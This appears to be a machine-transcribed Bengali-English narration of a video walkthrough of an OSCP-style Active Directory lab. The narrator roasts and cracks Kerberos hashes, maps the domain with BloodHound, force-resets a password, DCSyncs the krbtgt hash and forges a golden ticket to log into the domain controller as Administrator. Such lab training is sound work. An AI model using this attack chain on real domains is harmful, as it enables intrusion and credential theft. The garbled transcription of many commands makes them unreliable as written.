ইনপ্যাকেট গেট এমপি ইউজার্স, কমান্ড সিনট্যাক্সটা আমি দেখে নিই। ওকে, domain username, user file, hash format, TCP. Okay. User হচ্ছে ডোমেন হচ্ছে oscp ডট লোকাল স্ল্যাশ user file, users.txt, and then format hashtag format নিব আমি, and then হচ্ছে dc item ip 10.10.1.200। এন্ড যেহেতু হচ্ছে আমাদের কাছে কোনো পাসওয়ার্ড নাই, ডিসি তে চেক করার জন্য, ডিসি কোনো পাসওয়ার্ড আমার কাছে নাই, কোনো ইউজার নাই আমার কাছে, সো আমি এখানে নো পাস দিয়ে দিব। ওকে, ইউজার ফাইল, এটা স্পেলিং মনে হয় মিস্টেক আছে, ইউজার্স ফাইল হবে। ওকে, ইউজার্স ফাইল দেওয়ার পরে দেখেন আমি কিন্তু হচ্ছে কার্বস হ্যাশ পেয়ে গেছি একটা, এটা হচ্ছে লুসি ইউজারের। সো লেটস কপি দিস হ্যাশ, এন্ড আমি হ্যাশটা ক্র্যাক করবো হচ্ছে WSL এ, কজ আমার ভিএম আমি প্রেশার দিতে যাচ্ছি না। No, okay, then I will see lucy.txt, hashtag identify 0.txt, coverage 5, and then this is user share checklist password vegetables txt. ওকে, আমরা কিন্তু লুসি পাসওয়ার্ড পেয়ে গেছি, এটা ক্র্যাক হয়ে গেছে। লেটস কপি ইট। এট ফার্স্ট এখানে সেভ করি আমি লুসি ইউজার, এন্ড পাসওয়ার্ড হচ্ছে এটা। ওকে, সো লুসি ইউজার আর একটা পাসওয়ার্ড পেয়ে গেছি। এখন হচ্ছে আমরা ডিসি তে এটা ভেরিফাই করব যে এটা ডিসি ইউজারে কোনো প্রিভিলেজ আছে কিনা বা লগ ইন করার পারবো কিনা। আচ্ছা, আমি দেখি। xfc smd 10.1.200 atmv lucy atmp password
and here is my password. ওকে, সো এই অ্যাকাউন্টের থ্রুতে হচ্ছে ডিসি তে হচ্ছে প্রিভিলেজ আছে লগইনের। শেয়ার চেক করব। ওকে, তেমন কোনো শেয়ার ইন্টারেস্টিং নাই, অ্যাজ ইউজুয়াল কমন যেগুলো থাকে সেগুলোই আছে এখানে। এবার ট্রাই করবো, যেহেতু হচ্ছে আমাদের কাছে এখন একটা পাসওয়ার্ড আছে, তো আমরা হচ্ছে এসপিএস চেক করতে পারি এবার। সার্ভিস প্রিন্সিপলস বেসিক্যালি গেট ইউজার এসপিএনস, এন্ড এটা ফরম্যাটটা হচ্ছে ওএসসিপি লোকাল, লোকাল স্ল্যাশ ইউসি and password at the rate 10.10.1.200। কি বলতেছে এখানে? এখানে বলতেছে invalid credentials। সো মেবি হচ্ছে আমাদের এই পাসওয়ার্ডটা এলডিএফ এর পছন্দ না, ইয়ার পছন্দ হয় নাই। নাকি ওকে, ওয়েট, এই ডোমেন টাকাটা দেখি। ইউসি ডোমেন should be specified scp slash, yes, it's not working. Now it's working. ওএসসিপি সার্ভিস নট নোন বলতেছে। আচ্ছা, আমাকে আচ্ছা এটা সহ কোটেশন দিতে হবে, তাহলে আই গেস ওয়ার্ক করবে এটা ঠিকঠাক। ও সরি, আমার ফরম্যাট ভুল ছিল, মাই ব্যাড। হাইপেন ডিসি হাইপেন আইপি, yes, it should work now. OSCP local, yeah, it worked. এন্ড আমরা কিন্তু সার্ভিস প্রিন্সিপাল পেয়ে গেছি, একটা এইচটিটিপি সার্ভিস প্রিন্সিপাল আছে এসবিসি আইএস এর মধ্যে। সো আমরা হচ্ছে হাইপেন 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 রিকোয়েস্ট এটার হ্যাশ যেটা সেটা রিকোয়েস্ট করবো, সরি। আর রিকোয়েস্ট, ওকে রিকোয়েস্ট করলাম, বাট এটা কিন্তু আসে না, কারণ হচ্ছে কি ক্লক কিউ টাইমের ইস্যু। টাইম ইস্যু বলতে বেসিক্যালি হচ্ছে এখানে আমার টাইম আর হচ্ছে আমার ডিসির টাইম সেম না। যেমন আমি যদি আপনাকে দেখাই, এনডিপি ডেট হাইপেন কিউ 10.10.1.200। তো টাইম ডিফারেন্স আছে এখানে একটা। সো এই টাইম ডিফারেন্স ইয়ে করার জন্য আমাকে হচ্ছে এখানে হাইপেন ইউ ইউজ করতে হবে, and এখানে সুডো ইউজ করতে হবে। এখন যদি আমি আবার ট্রাই করি, আচ্ছা আবার আসতেছে, তেমন হচ্ছে আমার ডিফল্ট হচ্ছে এনটিপি সার্ভিস যেগুলো আছে এগুলোকে বন্ধ করে নিতে হবে। তো সেটার জন্য হচ্ছে আমি sudo nttp systemctl dot np আছে 99। সিস্টেম ডি টাইম হয়তো বা ইউজ করতেছে, এই যে টাইম সেন্সড, এটা আমাকে বন্ধ করতে হবে। টাইম সেন্সড
ওকে, এবার যদি আমি ট্রাই করি আবার ইউ, দেখেন কি টাইম কিন্তু চেঞ্জ হয়ে গেছে আমার এখানে, টাইম চেঞ্জ হয়ে গেছে। এন্ড এখন যদি আমি আবার রিকোয়েস্ট করি পিজিটি, ইয়েস আই গট দ্য হ্যাশ। এন্ড কপি করবো এটা, এন্ড সেম অ্যাজ প্রিভিয়াস আবার হচ্ছে গিয়া আমি এটা করছি কি is.txt hashtag is.txt slash user share checklist password duplicators log.txt, and it will be retrieved the password within a minute. Okay, so I got my password of IIS. এখানে নোট করি SBC underscore IIS colon and the password is this. সো ওকে, তো আমরা হচ্ছে এসপিএনস থেকে হচ্ছে আরেকটা ইউজার পাইলাম, এন্ড ইউজারের পাসওয়ার্ড আমরা পাইলাম। সো এবার হচ্ছে আমরা কি করতে পারি, এবার হচ্ছে আমরা আবার ডিসিতে চেক করতে পারি যে ডিসিতে এটা কোনো প্রিভিলেজ আছে কিনা, ডিসিতে কোনো কিছু করতে পারি কিনা। সো লেটস চেক ফর দ্যাট NXE NXE SBC underscore IIS identity password. ওকে, ডিসিতে প্রিভিলেজ আছে, এলডিপি আছে কিনা দেখি এটাতে। ইয়েস, এটাতে এলডিপি আছে, এলডিপি অ্যাক্সেস আছে। সো আমরা এখন ট্রাই করতে পারি ব্লড আন্ড দিয়ে হচ্ছে সবকিছু কালেক্ট করার জন্য। তো এটার জন্য আমি ইউজ করবো ব্লড আন্ড সিই, ব্লড আন্ড সিই পাইথন এন্ড দেন হাইফেন ইউ, ইউজার হচ্ছে এসবিসি আন্ডারস্কোর আইআইএস হাইফেন পি, পাসওয়ার্ড, পাসওয়ার্ড এটা, এন্ড হাইফেন সি কালেকশন মেথড অল, সব কালেক্ট করবো আমরা। এখানে কালেক্ট করার পর এটাকে একটা জিপ করবো, এন্ড দেন হচ্ছে আমার ডোমেন, ডোমেন হচ্ছে oscp ডট লোকাল, এন্ড নেম সার্ভার হচ্ছে 10.10.1.200, this should be good enough. ওকে, তো এটা হচ্ছে হয়ে গেছে, এন্ড আমার হচ্ছে এই ভিএম এর ভিতরে আমার ব্লড আনটাই, কজ আমি ভিএম ইউজ করি না, জাস্ট এই ভিডিওটা বানানোর জন্য, জাস্ট আপনাদের সাথে নলেজ শেয়ারিং এর জন্য আমি কষ্ট করে এই ভিডিওটা সেটআপ দিছি। মানে আমার এই ভিএম চালাইতে খুবই কষ্ট হইতেছে, খুবই বিরক্ত লাগতেছে ভিতরে ভিতরে। আহ SSH start kali SCP kali object kali slash ডেস্কটপে সেভ করবো আমি এটা। ওকে, ডেস্কটপে সেভ হয়ে গেছে, এখন আমি চেক করবো ব্লড আন্ডা অন আছে কিনা। ওকে, ব্লড আন্ডা অন নাই, অন হচ্ছে। And it needs a moment to start. ওকে, স্টার্ট হয়ে গেছে, এখন হচ্ছে আমরা ব্লড আন্ড চলে এসেছে। নাও লেটস লগ ইন। এন্ড এখানে আমরা জিপটা আপলোড করে দিব।
এন্ড আমরা এখানে একটু দেখবো যে কতক্ষণ লাগে এইটা ইনভেস্ট হইতে একটু টাইম নিবে, লাইক 1 to 2 minutes. Let's wait for this time. ওকে, ইনভেস্ট হয়ে গেছে, এবার অ্যানালাইসিস হচ্ছে, অ্যানালাইসিস হয়ে গেলে কমপ্লিট দেখাবে, কমপ্লিট দেখালে হচ্ছে আমরা শুরু করতে পারবো। ওকে, কমপ্লিটেড। সো এখানে আসার পরে এখন আমরা চেক করবো আমাদের কাছে যে ইউজারটা আছে, আইআইএস এসবিসি, এসবিসি আইআইএস। সো এর আউটবাউন্ড অবজেক্ট কন্ট্রোল চেক করবো। তো এখানে দেখেন এর হচ্ছে আউটবোর্ড অফ দ্য কন্ট্রোল হচ্ছে ফোর্স চেঞ্জ পাসওয়ার্ড, ইমেটের পাসওয়ার্ড চেঞ্জ করতে পারবে, আর ইমেটের থেকে আমরা ওই যাবো, সেটাও আমরা একটু দেখে নিই। And এখানে আউটবোর্ড কন্ট্রোল, ওকে। সো ইমেটের থেকে হচ্ছে আমরা এখানে দেখতেছি যে আমাদের ডিসি সিঙ্ক প্রিভিলেজ আছে পুরো ডোমেইনে, মেইন ডোমেইনে। সো এখান থেকে হচ্ছে ডিসি সিঙ্ক করে হচ্ছে আমরা ইয়েতে যেতে পারবো। সো আমরা যদি পাথটা দেখি, ডোমেইন, সরি ডোমেইন না, সিপি ডট ডোমেইন। সো আমরা যদি এখানে দেখি, তো আমরা প্রথমে হচ্ছে এখান থেকে, প্রথমে হচ্ছে আমরা আইআইএস সার্ভিস আসছে এখানে, এখান থেকে হচ্ছে ফোর্সফুলি পাসওয়ার্ড চেঞ্জ করবো ইমেটে পাসওয়ার্ড চেঞ্জ করার পর এখান থেকে আমরা ডিসি সিঙ্ক করে হচ্ছে পুরো ডোমেইনটা কভার করতে হবে। সো পাসওয়ার্ড কিভাবে চেঞ্জ করবো আমরা, ওইটা হচ্ছে এখানে গিয়ে দেওয়া আছে, উইন্ডোজ অ্যাপ ইউজ এন্ড লিনাক্স অ্যাপ ইউজ দুইটাই দেওয়া আছে। সো আমি উইন্ডোজে যাবো না, কারণ উইন্ডোজে যেতে গেলে আমার হচ্ছে আবার পাওয়ার ভিউ বা ইয়া আপলোড করতে হবে, সো এটা ঝামেলা। আমি হচ্ছে লিনাক্সে দুই ক্লিক করে ফেলবো ইজিলি এই কমান্ডটা দিয়া। এন্ড দিস, এখন ডোমেন কন্ট্রোলার এখানে হচ্ছে আমার চেঞ্জ করতে হবে, ডোমেন কন্ট্রোলার জায়গায় হচ্ছে আমি আইপি দেবো, ডোমেন কন্ট্রোলারে 10.10.1.200। আমার কাছে আইআইএস এর যে পাসওয়ার্ডটা আছে এই পাসওয়ার্ডটা আমি এখানে দিব, পাসওয়ার্ডটা সিঙ্গেল কোটেশন দিতে হবে, সিম্বল আছে। এন্ড এখানে হচ্ছে ইউজার নেম আইআইএস, এন্ড এখানে হচ্ছে ডোমেন, এন্ড ডোমেন হচ্ছে ওএসসিপি, এন্ড পাসওয়ার্ড আপাতত এখানে যা আছে ওই থাকুক, এই পাসওয়ার্ড দিলে চলবে। আর আমার ইউজার হচ্ছে ইমেল হবে, ইটি। আই হোপ সব ঠিকঠাক আছে। নেট এখন হচ্ছে আমরা ভেরিফাই করবো এনএফসি যে পাসওয়ার্ড আসলে চেঞ্জ হয়েছে কিনা। নেট identity password, and the password is new password at the rate 2023. ওকে, আমরা কিন্তু হচ্ছে পাসওয়ার্ড চেঞ্জ করতে পারছি। এখন হচ্ছে আমাদের যে কাজ, আচ্ছা আমরা সিক্রেট টার্ম করবো, যেহেতু ডিসি সিঙ্ক প্রিভিলেজ আছে আমাদের কাছে, ওটার জন্য হচ্ছে $10.10.1.200, আমরা কিন্তু হচ্ছে হ্যাশ টার্ম করে ফেলছি। এখন ডিসি সিঙ্ক করতে গেলে হচ্ছে আমাদের কার্বোরস রিলেম ফাইল রাইট করতে হবে, কার্বোরস KRV5 কনফিগ ফাইল যেটা আর কি। তো ওইটার জন্য হচ্ছে আমরা help, এখান থেকে অটোমেটিকলি জেনারেট করব। উম, উম, এই যে জেনারেট KRV5 ফাইল, সরি, এন্ড ফাইল লোকেশনটা হবে /etc/krd5.conf, এন্ড এখানে রুট পারমিশন লাগবে, আমাদের শুরু দিতে হবে। ওকে, সো এবার যদি হচ্ছে আমরা রিড করা ট্রাই করি /etc/krd5.conf, ইয়েস, দেখেন এটা জেনারেট হয়ে গেছে অটোমেটিকলি। এবার হচ্ছে আমরা এখান থেকে একটা গোল্ডেন টিকেট ইস্যু করবো,
টিকেটার টিকেট দিয়ে হচ্ছে আমরা একটা গোল্ডেন টিকেট ইস্যু করবো, এই গোল্ডেন টিকেট দিয়ে হচ্ছে আমরা একটা চেস ফাইল পাবো, টিকিট টিকিট ফাইল, ক্যাশ ফাইল। ওই ক্যাশ ফাইল দিয়ে অ্যাকচুয়ালি আমরা ডোমেইন কন্ট্রোলার লগ ইন করতে পারবো, মানে ডোমেইন অ্যাডমিন প্রিভিলেজ যেটা ওটা পারবো। সো আমরা এখন অ্যাকচুয়ালি ইনপুট সিলেক্ট করবো হচ্ছে ইয়াকে কি বলে অ্যাডমিনিস্ট্রেটরকে, ডোমেইনের যে অ্যাডমিনিস্ট্রেটরকে ইনপুট সিলেক্ট করবো টিজিটি হোস্ট দিয়া হচ্ছে এনটি এনটি হ্যাশ এটা দেখে নেই আগে। ইম্পারসনেট ইউজার ইম্পারসনেট করবো অ্যাডমিনিস্ট্রেটরকে, ইউজার পাসওয়ার্ড হ্যাশ হ্যাশ ইউজ করবো আমরা, তারপর হচ্ছে হ্যাশ ইউজ করবো। ওকে, সো এই যে এমটি হ্যাশটা ইউজ করবো আমরা। আর এখানে হচ্ছে হ্যাশটা দিয়ে আমি এই দেখেন কার্ভারস ইউজার, এই যে কেআরবিটিজিটি, সরি কেআরবিটিজিটি ইউজার যেটা আছে কার্ভারস বলেছি বারবার আমি। সো এটার হ্যাশটা আমরা ইউজ করবো, এখানে পেস্ট করলাম। এরপর হচ্ছে আমার দিতে হবে হচ্ছে ডোমেন এসআইডি, ইয়েস ডোমেন এসআইডি। প্রথমে ডোমেনটা মেনশন করি, ডোমেন হচ্ছে ওএসসিপি ডট লোকাল। এরপর হচ্ছে ডোমেন এসআইডি হচ্ছে এখানে পাবো, যে কোনো একটা অবজেক্ট ক্লিক করবো, এখানে যে কোনো একটা অবজেক্ট ইমেজ বা ইয়ার যে কোনো একটা অবজেক্ট ক্লিক করবো, ক্লিক করার পরে এই যে এখানে ডোমেন এসআইডি। সো ডোমেন এসআইডি সব ইউজার সব অবজেক্টের জন্য হচ্ছে সেম থাকবে, ডোমেন এসআইডি দিব। এবার হচ্ছে আমার হচ্ছে ইম্পারসনেট ইউজার যেটা আছে আহ ওইটা আমি লিখবো, ইম্পারসনেট করবো হচ্ছে তাকে আগে করবো, আমি হচ্ছে করবো অ্যাডমিনিস্ট্রেটর, অ্যাডমিনিস্ট্রেটর এন্টার। ওকে, দেখেন অ্যাডমিনিস্ট্রেটর হ্যাশ ফাইল চেস ফাইল পেয়ে গেছি আমরা। এখন এই চেস ফাইলটাকে হচ্ছে আমরা এনভায়রনমেন্টে পুশ করবো, এক্সপোর্ট এআর ডি 5 সিসি নেম ইকুয়াল। সো দেখেন কি লিস্টে গেলে আমরা কিন্তু হচ্ছে কেআরবিটিজি টিকিট আছে এটা দিয়ে পেয়ে গেছি। সো আমি আরো কয়েকটা টিকিট বানিয়ে নিবো। কেভিনো এন্ড দেন হচ্ছে সিআইএফএস স্ল্যাশ DC01। ওকে, দেখেন DC01 দিলে ওই সিলেক্ট লোকাল অটোমেটিক করে নিচ্ছে সেটা। এবার হচ্ছে হোস্টের জন্য আরেকটা নিব, হোস্ট। ওকে, হোস্ট ইয়াবিটি পেয়ে গেছি আমি। এবার হচ্ছে আমি জাস্ট সিম্পলি লগ ইন করতে পারবো, আই হোপ সো, ইন প্যাকেট WMI UXCC and then hyphen k hyphen no পাস। কোনো পাসওয়ার্ড ইউজ করবো না, কারণ আমরা হচ্ছে এই ফাইল যেটা আছে এই ফাইলটা ইউজ করবো, টিকিট ফাইল যেটা আছে এটা ইউজ করবো আমরা। এন্ড আমাদের ইয়ে হবে এটি এসপিআরটি ওর অ্যাডমিনিস্ট্রেটর @ DC01 ডট OSCP ডট লোকাল। ইয়েস, আমরা সাকসেসফুলি লগ ইন করতে পারছি। এন্ড হোস্ট নেম, এটার হোস্ট নেম হচ্ছে DC01। সেম জিনিসটা আমরা আরেকটা শেল নিই, আচ্ছা আরেকটা শেল নিলে হবে না কারণ এখানে টিকিট এক্সপেক্ট করা। আগে হচ্ছে আমরা আমাদের টার্গেট হচ্ছে M02 টার্গেট যাবো, M02। তো বেসিক্যালি হচ্ছে আমরা ডোমেইন অ্যাডমিনিস্ট্রেটর অ্যাকাউন্টটা ইয়ে করে ফেলছি, কম্প্রোমাইজ করে ফেলছি। এখন ডোমেইন অ্যাডমিনিস্ট্রেটর হইলে আমরা হচ্ছে ডোমেইনের যে কোনো কম্পিউটারের অ্যাক্সেস নিতে পারবো, এন্ড যে কোনো কম্পিউটারে আমরা অ্যাডমিনিস্ট্রেটর ফুল অ্যাক্সেস পেয়ে এটা পেয়ে যাবো। এন্ড আমরা যদি এই অ্যাকাউন্টে এটা থেকে হচ্ছে ফ্ল্যাগটা ই করতে যাই, M02 ফ্ল্যাগ, এই যে M02 ফ্ল্যাগ হচ্ছে এখানে টাইপ txt নাইস pivoting welcome to M02 and then DC01 beach, এটা হচ্ছে ডেস্কটপে, সরি yes
administrator desktop read well, we got our flag. Like seriously, you pawned TPC01. Congratulations. থ্যাংকস ফর ওয়াচিং দিস ভিডিও অ্যান্ড এবার আপনারা জানাবেন আমাকে আপনারা হচ্ছে মেশিনটা কিভাবে চান, মেশিনের ফাইল চান, মানে ভিএম ফাইল যেটা এটা চান, নাকি সেট আপ কিভাবে করলাম ওইটা নিয়ে একটা ব্লগ লিখবো না একটা ভিডিও বানাই দিব, কোনটা চান আমাকে একটু কমেন্টে জানাবেন। অ্যান্ড ইউ নো হোয়াট ইউ হ্যাভ টু ডু, জাস্ট স্ম্যাশ দ্য বাটন। থ্যাংকস ফর ওয়াচিং, আবার দেখা হবে নেক্সট কোনো ভিডিওতে। আল্লাহ হাফেজ।